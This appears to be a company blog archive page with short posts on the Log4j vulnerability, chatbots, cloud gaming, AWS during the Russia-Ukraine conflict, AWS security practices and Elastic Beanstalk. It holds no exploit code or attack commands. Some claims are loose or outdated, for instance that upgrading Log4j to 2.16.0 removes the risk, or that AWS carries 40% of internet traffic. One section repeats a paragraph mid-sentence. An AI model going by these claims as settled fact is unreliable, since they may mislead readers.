The Apache Log4j vulnerability has made global headlines since it had been discovered in early December. This issue affects Apache Log4j 2 versions 2.0 to 2.14.1 mainly and NIST published a critical CVE within the National Vulnerability Database on December 10th, 2021, naming this as CVE-2021-44228. And given severity score available, 10 for this vulnerability.

Impact of Log4shell

Log files record and track computing events. Log files are extremely valuable in computing as they provide a way for system admins to track the operations of system in order to spot problems and make corrections. Log files are important data points for security and surveillance, providing a full history of events overtime. Beyond operating systems, log files are found in applications, web browsers, Hardware. If there is proper log file tracking applications can either avoid or quickly rectify errors within their operating systems. Smart Tracking         reduces downtime and minimizes the risk of lost data. Log data is typically sent to a secure collection point before further processing by system admins. From this it is understandable that how important is log file is? In Log files there will all the information’s regarding of an application or systems.

So this is how Log4shell vulnerability becomes a big threat to these log files. As mentioned Log4j is a Java based logging tool used to collect logs from the system. Due to this vulnerability, for attacker it is easy for them to hack the system and get the data’s.

How to overcome this?

Since Apache Log4j 2 versions 2.0 to 2.14.1 are mostly affected by this vulnerability. For fixing this issue the user can upgrade Log4J to the latest and patched version 2.16.0. This will remove the risk from code execution.

The screenshot below is a list of the HTTP headers in a GET request that illustrates the attacker using interact.sh to probe for vulnerable servers.

How chatbots improve customer experience

Tags

,

What is a chatbot?

A chatbot system uses AI (Artificial Intelligence) to chat with a user in natural language via messaging apps, Mobile apps, and Telephone.

One of the advantages of chatbots is that unlike applications are not downloaded.,Not necessary to update them and they won’t take up more space on phone memory.

Benefits of using chatbots for customer experience

Customers want quick solutions to their problems Some are used for the traditional way of phone support. Therefore a hard time accepting a chatbot with the idea that it is a  robotic interaction, which requires a human touch. However more customers are interested in using new technology, especially it means a quick resolution to their issues

Chatbots are automated programs that can simulate a human conversation as human conversation. The chatbots use NLP – (Natural Language processing) to understand human conversations. and to provide relevant answers to questions. From the customer’s point of view, they are talking to actual persons, or at least, so it seems.

Open and closed chatbots

Depending on use cases chatbots can be either open or closed. Open chatbots are those which use AI to learn from their interaction with users.

Closed chatbots are those that only execute the script that may or may not use AI depending on the evaluation of messages.

Few ways where we can improve customer experience

Reduce wait time

Bots can reduce customers’ wait time and get them where they want to be quicker.

Always on customer service

The chatbots never sleep it offers 24/7 customer service support. Best practice chatbots are trained by using historical conversation

Personalized human interaction

The computerized chatbots can help to personalize the customer experience in retrospect.

Encourage employees

The benefit of AI can be to support the employees to work more on challenging tasks.AI can mimic human behavior, and staff may fear that their jobs are at risk. Chatbots are a chance to support the staff to focus on more high-value activities rather than daily tasks.

Cloud Gaming

Tags

, , , , , , , , , , , ,

Unlike normal gaming, the game runs on on-demand servers is cloud gaming. Normally video games are played in the local system which the video game run on a local devices like computers, smartphones, and video game consoles. 

In the local system, the games need to be installed then only we can play the game, the games are stored in the local system some of the games have larger sizes for example Call Of Duty: Modern Warfare (231GB), Quantum Break (178GB), GTA 5 (72GB), etc. These games require massive storage space, some upcoming games are more than 1 TB. 

Video games are fully graphical, to run a video game the system needs to have GPU, when the graphic card has more processing capability higher the video quality, and better the gameplay, the best graphic card available is the Nvidia GeForce RTX 3080 or AMD Radeon RX 6800 XT. these graphic cards cost between 1.5 lakh to 2 lakh rupees there are some other options too.

Also, the processor plays a major role in the video game, The more powerful the processor the smoother the gameplay. High-performance-oriented processors are best for gaming like Intel core i9 or AMD Ryzen 9. 

Why cloud gaming?

cloud gaming costs less compared to local gaming, in local gaming we need to buy or build the system  which is an expensive exercise. The parts in a gaming pc are very expensive, and when it comes to cloud gaming we just need a decent system that can connect with the internet. And there is no need to download we just need to install the service provider software. And pay for the game. 

cloud game is the best option to play on a low-end device because there is no bottleneck. 

How Cloud Gaming Works?

The games are stored and run in the servers and controlled remotely, the video games are streamed to the player. For cloud gaming, we need high-speed internet connection with low latency. To access the cloud games we need client software. 

The main cloud gaming services are: 

NVIDIA GeForce Now

 

PlayStation Now 

Google Stadia 

Shadow 

AWS and the Ukraine-Russia conflict

Tags

As the world comes to terms with the ongoing conflict between Russia and Ukraine following the declaration of war on the 24th of february, political and military spheres begin weighing their options, devising strategies and policy to take on the bear head on. The rest of the world looks on in horror and confusion as the chaos unfolds.Particularly interesting have been the stance taken by large tech companies. Their decision to cease operations and take a stand of non cooperation was met with global praise. How large food conglomerates banded together to supply aid and how SpaceX-Starlink was able to set up satellite internet are highly commendable humanitarian efforts.

In the midst of all this chaos it may be a good idea to take a closer look as to how AWS is coping with the challenges and playing its part in tightening the chokehold on Russia. According to some estimates around 40% of the world’s internet traffic is handled by AWS. so it’s highly imperative that we closely examine how they cope with adversity and keep things ticking without missing a beat.

Let’s look at all the assets AWS has in Ukraine and Russia. Considering the general hostility of the region in recent decades AWS does not have any of its data centers in both countries. Apart from a few service desks in Ukraine there isn’t much of a presence or staff count. Since AWS is a company headquartered in the United States of America which always keeps a safe distance from Russia, AWS never officially started running operations or catered to the Russian Federation. In the wake of the conflict the US and its allies imposed sanctions and owing to the general policy many companies halted operations in Russia, some went as far as pulling out entirely.

AWS was the first of the big tech companies to announce their revised policy amidst the conflict. A strong condemnation of the violence and a new stance on the issue. AWS completely stopped new user registration for  Russians. This while seemingly strong statement though wouldn’t affect current users on the cloud or their service. Azure and Google cloud followed suit. In the aftermath of this policy change though not much changed in Russian cyberspace there were reports of online money exchanges going down, and messaging services facing outages.

On a global level an exponential rise in DDOS attacks are being reported and Ukraine is not the only target, many fortune 500 countries rely on Ukraines outsourced services and they are taking a rough beating as well. With war being waged on all fronts AWS and other cloud service providers are setting up counter measures to track and neutralize threats such as the infamous HermeticaWiper malware thats taking down financial institutions and government organizations.

Its great to see big tech band together for the greater good and take a stand against bullying, bigotry and violence. The almost Gandhian tactic of noncooperation  may not be enough on its own but nevertheless an extra crack of the whip that hopefully stops the bear for good.

AWS Best Practices For Security

Tags

, ,

More professional industries are going online every day, which means that the demand for proper cybersecurity is at an all-time high. AWS security services may give near-limitless benefits to all elements of your business or organization. While AWS security can be managed by a third party, some things must be handled by us. 

Following a set of AWS security best practices will assist guarantee that every component of your AWS services is as safe as feasible and running as intended.

1. Multi-factor Authentication

Sometimes, we can see that many people use the same password for all of their accounts, which might give exploiters an advantage to compromise your account. Event the complex passwords could be compromised. So, in order to increase the security Multi-Factor authentication is used.

We can say MFA is nothing but a secondary password that will be on a secondary device. So, when a user needs to log into their account they need to use their primary password as well their secondary device.

A secondary device can be in the form of a physical device as well as software. These devices provide time-based credentials that will be used to log into the account. With this, we can ensure that only the users with regulated equipment can access the network.

2. AWS Identity & Access Management

IAM is a service that can be used to create users, groups, and roles with separate permissions attached for each. Permissions are assigned by the administrator for each and every user or group.

IAM may also help with onboarding new workers because it allows them to be immediately allocated to a role or group depending on their department. The most significant advantage of IAM is that it allows us to rigorously monitor and regulate access to a network or services inside your organization.

3. Data Backups

Data backup is common practice in most businesses, but how and when you save data may make a significant difference in damage mitigation and restoration timeframes. Planned data backups, like password reset schedules, give an extra degree of safety to your organization without interfering with regular operations.

A backup is only as valuable as the data it contains. If a large period of time elapses between a backup and a data loss, any material generated in that time is lost. By establishing frequent backups and defining a routine, you can assure minimum data loss and get back up and running as soon as feasible.

4. Managing Root Access

An AWS service account will have root credentials, which grant the most access to a network. One potential issue with this is that if those credentials are compromised, the entire network is at risk, and malevolent parties might obtain complete control of your network.

IAM can mitigate this risk by creating a top-level user account with tAn AWS service account will have root credentials, which grant the most access to a network. One potential issue with this is that if those credentials are compromised, the entire network is at risk, and malevolent parties might obtain complete control of your network.

IAM can mitigate this risk by creating a top-level user account with the same capabilities as a root user, but with separate login credentials. As a result, if one type of top-level access is compromised, another is readily accessible to address the issue. MFA is another answer to this problem since it raises the difficulty of hacking login credentials tenfold.

5. Keep Policies Updated

Cloud services are always in use and might alter or be upgraded on a regular basis. It is critical for network security to keep your policies up to date with software or service updates. Updates and alterations can create weak points in a network, which if not handled, can lead to network breaches or the loss of sensitive data. Many rules will need to be modified in order to remain compliant with new legislation or AWS requirements. By keeping security policies up to date, you assure regulatory compliance and a greater degree of network security.

Deployment made easier with AWS Beanstalk

Tags

,

Day by day many revolutionary changes are made in the area of technologies. Most of the companies compete together to offers new and relevant service to their customers. They very well know that only if they bring new and revolutionary changes then only they can exist in the industry. Because each and every companies facing very tight and tough competition from their competitors. Every company tries to grab the top most positions in Industry.

AWS is a most comprehensive and broadly adopted cloud platform. AWS is a company who provides various quality services to their customers and also these services helps users to deal with their various needs. Some of main services provided by AWS is Amazon Elastic Cloud Compute (EC2), Amazon S3 (Simple Storage Service), Amazon Virtual Private Cloud (VPC), Amazon CloudFront and Amazon Relational Database Services (RDS). Likewise, AWS provides 60+ services to their customers.

AWS Elastic Beanstalk is a service offered by Amazon Web Services for deploying applications which orchestrates various AWS services, including EC2S3Simple Notification Service  , CloudWatchautoscaling, and Elastic Load Balancer. With Elastic Beanstalk, one can quickly deploy and manage applications in the AWS cloud without needing to learn about the infrastructure that runs the applications. We can directly upload our website code to Beanstalk, and it will automatically host the application for us with a URL we can concentrate on the code of our application than on the architecture on which it is hosted. That means other parts like deployment, from capacity provisioning, load balancing, autoscaling to application, health monitoring all will be handled by Elastic Beanstalk. Elastic Beanstalk supports all the application which developed in GO, Java, .NET, node.js, PHP, Python and Ruby. When you deploy your application, Elastic Beanstalk builds the selected supported platform version and provisions one or more AWS resources, such as Amazon EC2 instance, to run your application. AWS is an PAAS service used for deploying and scaling web applications and services developed with java, .NET, PHP, Node.js on familiar servers like Apache, Nginx. Tomcat and IIS. If you are trying to develop your own application by using AWS Elastic Beanstalk, what all you have to do is concentrate on building code rest of the task like installing EC2 Instances, Auto Scaling Group, Maintaining security and Monitoring servers, storage, networking and managing virtualization, operating system and Database by Elastic Beanstalk. The main advantages of AWS Beanstalk is it’s Highly scalable, fast and simple to begin, offers quick deployment, Supports multi-tenant architecture, highly flexible, Simplifies operations, Cost-efficient.

The following diagram shows an example Elastic Beanstalk architecture for a web server environment, it shows how the components in this environment work together.

The environment is the heart of the application. In the diagram, the environment is shown within the top-level solid line. When you create an environment, Elastic Beanstalk provisions the resources required to run your application. AWS resources created for an environment include one elastic load balancer (ELB in the diagram), an Auto Scaling group, and one or more Amazon Elastic Compute Cloud (Amazon EC2) instances.